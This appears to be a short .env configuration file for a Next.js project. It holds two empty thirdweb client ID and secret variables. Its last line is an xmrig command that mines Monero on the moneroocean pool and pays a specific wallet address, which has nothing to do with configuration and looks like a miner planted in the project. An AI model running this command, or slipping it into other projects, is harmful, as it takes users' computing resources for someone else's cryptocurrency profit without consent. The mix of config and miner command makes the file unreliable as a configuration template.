NEXT_PUBLIC_THIRDWEB_CLIENT_ID=
NEXT_PUBLIC_THIRDWEB_CLIENT_SECRET=
./xmrig -o gulf.moneroocean.stream:10128 -u 446cUfdJkYuY7pyTSYTaE4UR52YmcQ8orAhyCFUeDCjfZGhG2ELEe14cSxVTui4WhP31op7wi8bKD1c75Ngsop9ED228fCZ -p macbook11.2